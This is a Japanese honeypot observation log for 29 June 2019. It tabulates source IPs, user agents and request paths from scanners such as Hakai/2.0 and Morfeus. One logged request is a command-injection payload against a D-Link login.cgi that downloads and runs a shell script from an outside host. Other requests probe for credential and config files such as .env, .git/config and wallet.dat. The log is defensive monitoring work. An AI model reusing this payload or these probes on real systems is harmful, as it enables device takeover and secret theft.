ハニーポット(仮) 観測記録 2019/06/29分です。
Hakai/2.0(D-Linkの脆弱性狙い)、 Morfeus Fucking Scanner(PHP脆弱性スキャナーボット) でのアクセスがありました。
総アクセス数:40 (前日比:+1)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 104.200.134.161 | United States |
| 1 | 112.125.92.74 | China |
| 1 | 134.175.151.188 | China |
| 1 | 139.162.188.174 | Germany |
| 1 | 176.58.98.226 | United Kingdom |
| 1 | 178.62.203.61 | Netherlands |
| 16 | 185.234.217.243 | Ireland |
| 1 | 185.234.218.18 | Ireland |
| 3 | 185.53.88.37 | Estonia |
| 1 | 200.55.253.26 | Ecuador |
| 2 | 212.92.121.227 | Netherlands |
| 1 | 45.227.255.100 | Panama |
| 2 | 59.36.132.222 | China |
| 2 | 60.191.52.254 | China |
| 3 | 62.75.230.143 | France |
| 1 | 68.183.67.223 | Germany |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 11 | - |
| 1 | curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0zlib/1.2.3 libidn/1.18 libssh2/1.2.2 |
| 1 | Hakai/2.0 |
| 3 | Morfeus Fucking Scanner |
| 2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
| 17 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | CONNECT | www.baidu.com:443 | HTTP/1.1 |
| 2 | GET | /deployment-config.json | HTTP/1.1 |
| 2 | GET | /.env | HTTP/1.1 |
| 2 | GET | /.ftpconfig | HTTP/1.1 |
| 2 | GET | /ftpsync.settings | HTTP/1.1 |
| 1 | GET | /.git/config | HTTP/1.1 |
| 1 | GET | http://www.baidu.com/ | HTTP/1.1 |
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://178[.]62[.]27[.]133/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
| 1 | GET | /Login.htm | HTTP/1.1 |
| 2 | GET | /.remote-sync.json | HTTP/1.1 |
| 2 | GET | /sftp-config.json | HTTP/1.1 |
| 3 | GET | /user/soapCaller.bs | HTTP/1.1 |
| 2 | GET | /.vscode/ftp-sync.json | HTTP/1.1 |
| 2 | GET | /.vscode/sftp.json | HTTP/1.1 |
| 1 | GET | /WSMAN/ | HTTP/1.1 |
| 2 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | http://112[.]124[.]42[.]80:63435/ | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | HEAD | /robots.txt | HTTP/1.1 |
| 1 | HEAD | /wallet.dat | HTTP/1.0 |
| 2 | HEAD | /wallet.dat | HTTP/1.1 |
| 3 | PROPFIND | / | HTTP/1.1 |
| 3 | \x03 |
